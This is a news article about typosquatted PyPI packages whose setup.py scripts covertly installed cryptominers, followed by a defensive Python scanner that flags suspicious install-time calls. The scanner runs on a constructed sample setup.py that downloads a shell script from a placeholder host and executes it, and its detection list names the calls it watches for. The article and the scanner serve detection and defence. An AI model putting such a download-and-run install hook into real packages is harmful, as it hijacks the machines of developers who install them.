Researchers found multiple packages in Python’s PyPI repository that turned developers’ workstations into cryptomining machines.
The packages were published by the same rogue account and tricked developers into downloading them by using misspelled names of well-known projects. The malicious packages have already been downloaded thousands of times.
Six packages containing malicious code were discovered on the Python Package Index (PyPI) in April: maratlib, maratlib1, matplatlib-plus, mllearnlib, mplatlib and learninglib.
All six packages were uploaded by the user “nedog123” and are misspelled versions of the legitimate plotting software matplotlib.
Ax Sharma, a security researcher at Sonatype who investigated this malicious activity, identified the maratlib package as a dependency used by the other malicious components:
“For each of these packages, the malicious code is contained in the setup.py file which is a build script that runs during a package’s installation,” the researcher writes in a blog post.
While analyzing the package, Sharma found that it tried to download a Bash script (aza2.sh) from a GitHub repository that is no longer available. He was able to track the author’s aliases on GitHub and found that the script was used to run a cryptominer called “Ubqminer,” which worked covertly on the compromised machine.
The researcher also revealed that the malware author used a Kryptex wallet address other than the default one to mine the Ubiq cryptocurrency.
In another variant, the script used the open-source T-Rex cryptomining program, Sharma noted.
Attackers constantly target open-source code repositories such as PyPI and npm (for Node.js). Even when the download count is low, the risk is significant, since developers may integrate the malicious code into other, much more popular projects.
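Because the payload lives in setup.py, which pip executes during installation, a reviewer can inspect that file before installing. The scanner below is an added example, not Sonatype's or the researcher's tooling: it parses a setup.py with Python's ast module and reports calls that fetch remote content, spawn processes or decode hidden code, resolving import aliases so that `import subprocess as sp` is still caught. The sample setup.py is constructed for the demo and its URL is a placeholder.

```python
import ast

# Calls a plain build script has no reason to make: spawning processes,
# fetching remote content, or decoding and executing hidden code.
SUSPICIOUS_CALLS = {
    "subprocess.run", "subprocess.call", "subprocess.Popen",
    "subprocess.check_output", "os.system", "os.popen",
    "urllib.request.urlopen", "urllib.request.urlretrieve", "requests.get",
    "exec", "eval", "base64.b64decode",
}


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_setup_py(source):
    """Return sorted (line, fully qualified call) pairs for suspicious calls."""
    tree = ast.parse(source)
    aliases = {}  # local binding -> fully qualified name, taken from imports
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                if a.asname:
                    aliases[a.asname] = a.name
        elif isinstance(node, ast.ImportFrom):
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module or ''}.{a.name}"
    findings = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted_name(node.func)
        if name is None:
            continue
        head, _, rest = name.partition(".")
        full = aliases.get(head, head) + ("." + rest if rest else "")
        if full in SUSPICIOUS_CALLS:
            findings.append((node.lineno, full))
    return sorted(findings)


# Constructed sample mirroring the pattern described above (fetch a shell
# script at install time and run it); the URL is a placeholder, not a real host.
SAMPLE_SETUP_PY = '''\
from setuptools import setup
import subprocess as sp
from urllib.request import urlretrieve

urlretrieve("https://example.invalid/placeholder.sh", "/tmp/s.sh")
sp.call(["bash", "/tmp/s.sh"])

setup(name="maratlib", version="0.1")
'''

if __name__ == "__main__":
    for line, call in scan_setup_py(SAMPLE_SETUP_PY):
        print(f"setup.py:{line}: install-time call to {call}")
```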
Since April, the packages have accumulated almost 5,000 downloads. The highest download count of 2,371 was recorded by the package “maratlib.”